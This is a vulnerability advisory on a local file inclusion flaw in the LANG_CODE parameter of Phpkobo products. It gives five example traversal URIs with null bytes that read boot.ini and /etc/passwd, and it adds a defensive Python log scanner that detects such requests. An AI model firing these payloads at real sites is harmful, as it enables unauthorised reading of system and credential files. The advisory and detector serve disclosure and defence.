Phpkobo Multiple Products 'LANG_CODE' Parameter Local File Include Vulnerability

Attackers may exploit this issue through a browser.

The following example URIs are available:

http://www.example.com/web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/codelib/sys/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
http://www.example.com/web/staff/app/common.inc.php?LANG_CODE=..//..//..//..//boot.ini%00 and /etc/passwd%00
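
For defenders reviewing web server logs, the following is an added example (not part of the original advisory and not Phpkobo code) that flags requests whose LANG_CODE value carries the patterns seen in the URIs above. The combined access-log format, the function names and the sample entries are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Script paths taken from the advisory's example URIs, matched as suffixes
# because the install prefix ("/web" in the examples) varies per site.
LISTED_SCRIPTS = (
    "/codelib/cfg/common.inc.php",
    "/codelib/sys/common.inc.php",
    "/staff/common.inc.php",
    "/staff/file.php",
    "/staff/app/common.inc.php",
)

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def lang_code_findings(target):
    """Return the reasons a request target's LANG_CODE value is suspicious."""
    findings = []
    # parse_qsl percent-decodes once, which is what the PHP script receives.
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name == "LANG_CODE":
            if "\x00" in value:
                findings.append("null byte")
            if ".." in value:
                findings.append("parent-directory sequence")
            if "/" in value or "\\" in value:
                findings.append("path separator")
    return findings

def scan(log_lines):
    """Return (line_number, is_listed_script, findings) per suspicious entry."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            target = match.group(1)
            findings = lang_code_findings(target)
            if findings:
                listed = urlsplit(target).path.endswith(LISTED_SCRIPTS)
                hits.append((number, listed, findings))
    return hits

# Constructed sample entries (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2010:10:00:00 +0000] "GET /web/staff/file.php?LANG_CODE=en HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2010:10:00:07 +0000] "GET /web/staff/file.php?LANG_CODE=..//..//..//..//boot.ini%00 HTTP/1.1" 200 311',
    '203.0.113.9 - - [01/Jan/2010:10:00:09 +0000] "GET /web/codelib/cfg/common.inc.php?LANG_CODE=..//..//..//..//etc/passwd%00 HTTP/1.1" 200 900',
]
```

A hit on one of the listed scripts with a 200 response is worth following up by checking the response size against that of a normal request to the same script.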


 

Copyright 2010, SecurityFocus